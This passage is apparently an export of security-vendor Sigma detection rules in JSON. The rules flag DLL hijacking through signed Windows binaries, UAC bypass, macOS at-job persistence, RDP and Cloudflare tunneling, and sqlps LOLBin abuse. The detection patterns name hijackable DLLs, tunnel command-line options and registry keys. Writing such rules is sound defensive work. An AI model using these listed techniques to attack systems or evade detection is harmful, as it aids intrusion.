Hijacking via the Microsoft developer tool MsiTran.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiTran.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e", "rule_name": "DLL Hijacking via MsiTran.exe", "rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-11-04", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593856Z", "creation_date": "2026-03-23T11:45:34.593859Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593867Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_logman.yml", "content": "title: DLL Hijacking via Logman.exe\nid: 15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a\ndescription: |\n Detects potential Windows DLL Hijacking via Logman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Logman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\pdh.dll'\n - '\\pla.dll'\n - '\\sspicli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a", "rule_name": "DLL Hijacking via Logman.exe", "rule_description": "Detects potential Windows DLL Hijacking via Logman.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15f0e956-c482-487d-a3f5-28d5c667c6a3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.598362Z", "creation_date": "2026-03-23T11:45:34.598366Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.598374Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1053/002/" ], "name": "t1053_002_at_jobs_created.yml", "content": "title: At Jobs Created\nid: 15f0e956-c482-487d-a3f5-28d5c667c6a3\ndescription: |\n Detects the creation of an at job file.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/07/23\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_files:\n - Path|startswith: '/private/var/at/jobs/'\n - TargetPath|startswith: '/private/var/at/jobs/'\n\n selection_access:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15f0e956-c482-487d-a3f5-28d5c667c6a3", "rule_name": "At Jobs Created", "rule_description": "Detects the creation of an at job file.\nAdversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\n", "rule_creation_date": "2024-07-23", "rule_modified_date": "2025-10-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1053.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15f6d712-e496-4981-8fd1-3626e0c36d24", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097842Z", "creation_date": "2026-03-23T11:45:34.097844Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097848Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_makecab.yml", "content": "title: DLL Hijacking via makecab.exe\nid: 15f6d712-e496-4981-8fd1-3626e0c36d24\ndescription: |\n Detects potential Windows DLL Hijacking via makecab.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'makecab.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15f6d712-e496-4981-8fd1-3626e0c36d24", "rule_name": "DLL Hijacking via makecab.exe", "rule_description": "Detects potential Windows DLL Hijacking via makecab.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.082797Z", "creation_date": "2026-03-23T11:45:34.082799Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.082804Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/nccgroup/SocksOverRDP", "https://attack.mitre.org/techniques/T1572" ], "name": "t1572_socks_over_rdp_configuration_set.yml", "content": "title: SocksOverRDP Registry Configuration Set\nid: 15fa5274-bd22-4eb6-862a-dfc8deceaaf8\ndescription: |\n Detects the SocksOverRDP registry configuration being set in registry.\n SocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\n When registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\n Adversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\n It is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\nreferences:\n - https://github.com/nccgroup/SocksOverRDP\n - https://attack.mitre.org/techniques/T1572\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\AddIns\\SocksOverRDP-Plugin'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8", "rule_name": "SocksOverRDP Registry Configuration Set", "rule_description": "Detects the SocksOverRDP registry configuration being set in registry.\nSocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\nWhen registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\nAdversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\nIt is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\n", "rule_creation_date": "2025-09-24", "rule_modified_date": "2025-09-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.001", "attack.t1572" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619209Z", "creation_date": "2026-03-23T11:45:34.619211Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619215Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://www.intrinsec.com/akira_ransomware/", "https://attack.mitre.org/techniques/T1102/" ], "name": "t1102_cloudflare_tunnel.yml", "content": "title: Suspicious Cloudflare Binary Execution\nid: 161d8bc5-7221-45bb-8d1d-89c6eae319c4\ndescription: |\n Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\n This technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\n It is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\n - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n - https://www.intrinsec.com/akira_ransomware/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2025/05/15\nmodified: 2025/06/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n Image|endswith:\n - '\\cloudflared.exe'\n - '\\cloudflared-windows-386.exe'\n - '\\cloudflared-windows-amd64.exe'\n\n selection_imphash:\n Imphash:\n - '2548C430C08A1B7D76EDE5D863ADB956'\n - 'fc22e4f95641f6606222121e1a8a8508'\n\n selection_run:\n CommandLine|contains|all:\n - ' tunnel '\n - ' run'\n\n selection_token:\n CommandLine|contains:\n - ' --token '\n - ' --token-file '\n - ' --config '\n\n selection_service:\n CommandLine|contains|all:\n - ' service '\n - ' install'\n\n selection_url:\n CommandLine|contains|all:\n - ' tunnel '\n - ' --url '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: (selection_image or selection_imphash) and ((selection_run and selection_token) or selection_service or selection_url) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4", "rule_name": "Suspicious Cloudflare Binary Execution", "rule_description": "Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\nThis technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\nIt is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\n", "rule_creation_date": "2025-05-15", "rule_modified_date": "2025-06-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1102" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587736Z", "creation_date": "2026-03-23T11:45:34.587740Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587748Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_winsat.yml", "content": "title: DLL Hijacking via winsat.exe\nid: 1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d\ndescription: |\n Detects potential Windows DLL Hijacking via winsat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winsat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\version.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d", "rule_name": "DLL Hijacking via winsat.exe", "rule_description": "Detects potential Windows DLL Hijacking via winsat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092433Z", "creation_date": "2026-03-23T11:45:34.092435Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.092440Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/hfiref0x/UACME" ], "name": "t1548_002_uac_bypass_inetmgr.yml", "content": "title: UAC Bypass Executed via InetMgr\nid: 1659265d-21ea-4fb4-8440-e0a5ea0f2567\ndescription: |\n Detection of UAC bypass for `InetMgr.exe`.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/08\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\inetsrv\\InetMgr.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n cond_ms_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not cond_ms_signed\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567", "rule_name": "UAC Bypass Executed via InetMgr", "rule_description": "Detection of UAC bypass for `InetMgr.exe`.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\n", "rule_creation_date": "2021-01-08", "rule_modified_date": "2025-01-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002", "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1677f32b-ab7c-4b86-a079-48c3166975e0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.595711Z", "creation_date": "2026-03-23T11:45:34.595714Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.595722Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility", "https://twitter.com/MsftSecIntel/status/1526680337216114693", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1127/" ], "name": "t1059_001_suspicious_sqlps_execution.yml", "content": "title: Suspicious sqlps.exe Execution\nid: 1677f32b-ab7c-4b86-a079-48c3166975e0\ndescription: |\n Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\n Attackers can use this utility as a LOLBin to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility\n - https://twitter.com/MsftSecIntel/status/1526680337216114693\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/07\nmodified: 2025/01/30\nauthor: 